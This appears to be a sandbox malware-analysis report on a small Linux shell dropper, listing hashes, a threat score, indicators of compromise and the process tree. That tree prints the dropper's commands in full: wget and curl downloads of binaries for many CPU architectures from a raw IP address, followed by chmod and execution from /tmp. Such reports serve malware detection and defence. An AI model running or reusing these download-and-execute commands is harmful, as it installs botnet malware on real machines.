acfcace3e1edd4452ea4331959a9ac3c29fa97c32c5a64b057089d783d5e1ec4

Analysis

max time kernel
58s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
22-05-2024 19:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118
Size

2KB
MD5

684aa6ccc5ea77e869f0d15c781fbe2c
SHA1

c97378f0867b7639ca3cb4d12f9000a8e00dadd2
SHA256

acfcace3e1edd4452ea4331959a9ac3c29fa97c32c5a64b057089d783d5e1ec4
SHA512

fb2f75b1bcb24a22ec4e3c5da89bdf09adb4a9a75f4053e93480c670269c74d233267f6593b71aaaa8c86b231bb0f398a78b9ebcb41caaf61a8a74eb5162ec06

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 10 IoCs

Processes:

cpcpcpcpcpcpcpcpcpcp

ioc pid process

/tmp/cp 1501 cp
/tmp/cp 1507 cp
/tmp/cp 1513 cp
/tmp/cp 1519 cp
/tmp/cp 1525 cp
/tmp/cp 1533 cp
/tmp/cp 1539 cp
/tmp/cp 1545 cp
/tmp/cp 1551 cp
/tmp/cp 1557 cp
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118

description ioc process

File opened for modification /tmp/cp 684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118

ioc	pid	process
/tmp/cp	1501	cp
/tmp/cp	1507	cp
/tmp/cp	1513	cp
/tmp/cp	1519	cp
/tmp/cp	1525	cp
/tmp/cp	1533	cp
/tmp/cp	1539	cp
/tmp/cp	1545	cp
/tmp/cp	1551	cp
/tmp/cp	1557	cp

description	ioc	process
File opened for modification	/tmp/cp	684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118

/tmp/684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118
/tmp/684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:1485
- /usr/bin/wget
  wget http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.x86
  2⤵
  PID:1486
- /usr/bin/curl
  curl -O http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.x86
  2⤵
  PID:1490
- /bin/cat
  cat stupidlittlepricknamedrickhahahjokerhahaha.x86
  2⤵
  PID:1499
- /bin/chmod
  chmod +x 684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118 config-err-Qp8bpc cp netplan_uke77wf9 snap-private-tmp ssh-58vIu3acq33S systemd-private-ad26bb6445d14659aa680edbf10c9dc8-bolt.service-DXQiwS systemd-private-ad26bb6445d14659aa680edbf10c9dc8-colord.service-1vzBvZ systemd-private-ad26bb6445d14659aa680edbf10c9dc8-ModemManager.service-vc0hNE systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-resolved.service-b9sk22 systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-timedated.service-ZNgvUV
  2⤵
  PID:1500
- /tmp/cp
  ./cp x86
  2⤵
  - Executes dropped EXE
  PID:1501
- /usr/bin/wget
  wget http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.mips
  2⤵
  PID:1503
- /usr/bin/curl
  curl -O http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.mips
  2⤵
  PID:1504
- /bin/cat
  cat stupidlittlepricknamedrickhahahjokerhahaha.mips
  2⤵
  PID:1505
- /bin/chmod
  chmod +x 684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118 config-err-Qp8bpc cp netplan_uke77wf9 snap-private-tmp ssh-58vIu3acq33S systemd-private-ad26bb6445d14659aa680edbf10c9dc8-bolt.service-DXQiwS systemd-private-ad26bb6445d14659aa680edbf10c9dc8-colord.service-1vzBvZ systemd-private-ad26bb6445d14659aa680edbf10c9dc8-ModemManager.service-vc0hNE systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-resolved.service-b9sk22 systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-timedated.service-ZNgvUV
  2⤵
  PID:1506
- /tmp/cp
  ./cp mips
  2⤵
  - Executes dropped EXE
  PID:1507
- /usr/bin/wget
  wget http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.mpsl
  2⤵
  PID:1509
- /usr/bin/curl
  curl -O http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.mpsl
  2⤵
  PID:1510
- /bin/cat
  cat stupidlittlepricknamedrickhahahjokerhahaha.mpsl
  2⤵
  PID:1511
- /bin/chmod
  chmod +x 684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118 config-err-Qp8bpc cp netplan_uke77wf9 snap-private-tmp ssh-58vIu3acq33S systemd-private-ad26bb6445d14659aa680edbf10c9dc8-bolt.service-DXQiwS systemd-private-ad26bb6445d14659aa680edbf10c9dc8-colord.service-1vzBvZ systemd-private-ad26bb6445d14659aa680edbf10c9dc8-ModemManager.service-vc0hNE systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-resolved.service-b9sk22 systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-timedated.service-ZNgvUV
  2⤵
  PID:1512
- /tmp/cp
  ./cp mpsl
  2⤵
  - Executes dropped EXE
  PID:1513
- /usr/bin/wget
  wget http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.arm4
  2⤵
  PID:1515
- /usr/bin/curl
  curl -O http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.arm4
  2⤵
  PID:1516
- /bin/cat
  cat stupidlittlepricknamedrickhahahjokerhahaha.arm4
  2⤵
  PID:1517
- /bin/chmod
  chmod +x 684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118 config-err-Qp8bpc cp netplan_uke77wf9 snap-private-tmp ssh-58vIu3acq33S systemd-private-ad26bb6445d14659aa680edbf10c9dc8-bolt.service-DXQiwS systemd-private-ad26bb6445d14659aa680edbf10c9dc8-colord.service-1vzBvZ systemd-private-ad26bb6445d14659aa680edbf10c9dc8-ModemManager.service-vc0hNE systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-resolved.service-b9sk22 systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-timedated.service-ZNgvUV
  2⤵
  PID:1518
- /tmp/cp
  ./cp arm4
  2⤵
  - Executes dropped EXE
  PID:1519
- /usr/bin/wget
  wget http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.arm5
  2⤵
  PID:1521
- /usr/bin/curl
  curl -O http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.arm5
  2⤵
  PID:1522
- /bin/cat
  cat stupidlittlepricknamedrickhahahjokerhahaha.arm5
  2⤵
  PID:1523
- /bin/chmod
  chmod +x 684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118 config-err-Qp8bpc cp netplan_uke77wf9 snap-private-tmp ssh-58vIu3acq33S systemd-private-ad26bb6445d14659aa680edbf10c9dc8-bolt.service-DXQiwS systemd-private-ad26bb6445d14659aa680edbf10c9dc8-colord.service-1vzBvZ systemd-private-ad26bb6445d14659aa680edbf10c9dc8-ModemManager.service-vc0hNE systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-resolved.service-b9sk22 systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-timedated.service-ZNgvUV
  2⤵
  PID:1524
- /tmp/cp
  ./cp arm5
  2⤵
  - Executes dropped EXE
  PID:1525
- /usr/bin/wget
  wget http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.arm6
  2⤵
  PID:1527
- /usr/bin/curl
  curl -O http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.arm6
  2⤵
  PID:1530
- /bin/cat
  cat stupidlittlepricknamedrickhahahjokerhahaha.arm6
  2⤵
  PID:1531
- /bin/chmod
  chmod +x 684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118 config-err-Qp8bpc cp netplan_uke77wf9 snap-private-tmp ssh-58vIu3acq33S systemd-private-ad26bb6445d14659aa680edbf10c9dc8-bolt.service-DXQiwS systemd-private-ad26bb6445d14659aa680edbf10c9dc8-colord.service-1vzBvZ systemd-private-ad26bb6445d14659aa680edbf10c9dc8-ModemManager.service-vc0hNE systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-resolved.service-b9sk22
  2⤵
  PID:1532
- /tmp/cp
  ./cp arm6
  2⤵
  - Executes dropped EXE
  PID:1533
- /usr/bin/wget
  wget http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.arm7
  2⤵
  PID:1535
- /usr/bin/curl
  curl -O http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.arm7
  2⤵
  PID:1536
- /bin/cat
  cat stupidlittlepricknamedrickhahahjokerhahaha.arm7
  2⤵
  PID:1537
- /bin/chmod
  chmod +x 684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118 config-err-Qp8bpc cp netplan_uke77wf9 snap-private-tmp ssh-58vIu3acq33S systemd-private-ad26bb6445d14659aa680edbf10c9dc8-bolt.service-DXQiwS systemd-private-ad26bb6445d14659aa680edbf10c9dc8-colord.service-1vzBvZ systemd-private-ad26bb6445d14659aa680edbf10c9dc8-ModemManager.service-vc0hNE systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-resolved.service-b9sk22
  2⤵
  PID:1538
- /tmp/cp
  ./cp arm7
  2⤵
  - Executes dropped EXE
  PID:1539
- /usr/bin/wget
  wget http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.ppc
  2⤵
  PID:1541
- /usr/bin/curl
  curl -O http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.ppc
  2⤵
  PID:1542
- /bin/cat
  cat stupidlittlepricknamedrickhahahjokerhahaha.ppc
  2⤵
  PID:1543
- /bin/chmod
  chmod +x 684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118 config-err-Qp8bpc cp netplan_uke77wf9 snap-private-tmp ssh-58vIu3acq33S systemd-private-ad26bb6445d14659aa680edbf10c9dc8-bolt.service-DXQiwS systemd-private-ad26bb6445d14659aa680edbf10c9dc8-colord.service-1vzBvZ systemd-private-ad26bb6445d14659aa680edbf10c9dc8-ModemManager.service-vc0hNE systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-resolved.service-b9sk22
  2⤵
  PID:1544
- /tmp/cp
  ./cp ppc
  2⤵
  - Executes dropped EXE
  PID:1545
- /usr/bin/wget
  wget http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.m68k
  2⤵
  PID:1547
- /usr/bin/curl
  curl -O http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.m68k
  2⤵
  PID:1548
- /bin/cat
  cat stupidlittlepricknamedrickhahahjokerhahaha.m68k
  2⤵
  PID:1549
- /bin/chmod
  chmod +x 684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118 config-err-Qp8bpc cp netplan_uke77wf9 snap-private-tmp ssh-58vIu3acq33S systemd-private-ad26bb6445d14659aa680edbf10c9dc8-bolt.service-DXQiwS systemd-private-ad26bb6445d14659aa680edbf10c9dc8-colord.service-1vzBvZ systemd-private-ad26bb6445d14659aa680edbf10c9dc8-ModemManager.service-vc0hNE systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-resolved.service-b9sk22
  2⤵
  PID:1550
- /tmp/cp
  ./cp m68k
  2⤵
  - Executes dropped EXE
  PID:1551
- /usr/bin/wget
  wget http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.sh4
  2⤵
  PID:1553
- /usr/bin/curl
  curl -O http://45.95.168.196/bins/stupidlittlepricknamedrickhahahjokerhahaha.sh4
  2⤵
  PID:1554
- /bin/cat
  cat stupidlittlepricknamedrickhahahjokerhahaha.sh4
  2⤵
  PID:1555
- /bin/chmod
  chmod +x 684aa6ccc5ea77e869f0d15c781fbe2c_JaffaCakes118 config-err-Qp8bpc cp netplan_uke77wf9 snap-private-tmp ssh-58vIu3acq33S systemd-private-ad26bb6445d14659aa680edbf10c9dc8-bolt.service-DXQiwS systemd-private-ad26bb6445d14659aa680edbf10c9dc8-colord.service-1vzBvZ systemd-private-ad26bb6445d14659aa680edbf10c9dc8-ModemManager.service-vc0hNE systemd-private-ad26bb6445d14659aa680edbf10c9dc8-systemd-resolved.service-b9sk22
  2⤵
  PID:1556
- /tmp/cp
  ./cp sh4
  2⤵
  - Executes dropped EXE
  PID:1557

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads